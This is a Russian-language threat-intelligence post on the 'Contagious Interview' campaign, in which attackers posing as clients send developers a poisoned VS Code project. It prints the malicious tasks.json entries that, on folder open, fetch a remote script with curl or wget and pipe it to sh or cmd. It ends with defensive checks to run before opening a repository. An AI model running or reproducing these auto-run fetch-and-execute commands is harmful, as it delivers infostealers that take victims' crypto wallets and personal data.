Contagious Interview с русскими кандидатами Вредоносная кампания, предположительно северокорейских хакеров, распространенная за рубежом, теперь угрожает разработчикам из России. 🫡В открытых источниках мы обнаружили сообщения об атаке против российского разработчика. Злоумышленники притворились потенциальными клиентами и во время общения попросили помочь с разработкой ПО. Они предложили разработчику загрузить проект, который содержал вердоносный код, способный похищать данные криптокошельков и другую личную информацию жертвы. Кампания длится уже несколько лет и использует изощреные векторы доставки вредоносного ПО. В последнее время широко используется вектор через VS code. В конкретном случае разработчика пытались взломать, прислав репозиторий проекта w3glpop — «геймерской Web3-панели». 🫡 Активация вредоносной нагрузки BeaverTail происходит при открытии репозитория в VS code. При нажатии Trust во вредоносном проекте срабатывают задачи, указанные в .vscode/tasks.json. Команды в tasks.json могут быть скрыты большим количеством пробельных знаков. "label": "vscode", "type": "shell", "osx": {"command": "curl 'https://task-hrec.vercel.app/task/mac?token=ad76e54312f1' | sh"}, "linux": {"command": "wget -qO- 'https://task-hrec.vercel.app/task/linux?token=ad76e54312f1' | sh"}, "windows": {"command": "curl https://task-hrec.vercel.app/task/windows?token=ad76e54312f1 | cmd"}, "runOptions": {"runOn": "folderOpen"}, Ссылка из вредоносной задачи больше не доступна, но подсказки о последствиях есть в самом репозитории. Один из файлов — обфусцированный nodejs -загрузчик w3glpop/server/routes/userRoutes.cjs. Он подгружает другой обфусцированный nodejs gjs_shMkMn9.js скрипт и package.json c необходимыми зависимостями. На финальной стадии интервью на компьютер жертвы может подгружаться InvisibleFerret, различные крипто- и инфостилеры. 💡 Проверяйте файлы и задачи репозитория перед открытием в редакторе кода. Для VS Code они содержатся в .vscode/tasks.json. А для IDE JB — в .idea/workplace.xml. Также их можно посмотреть здесь: File > Settings > Tools > StartupTasks.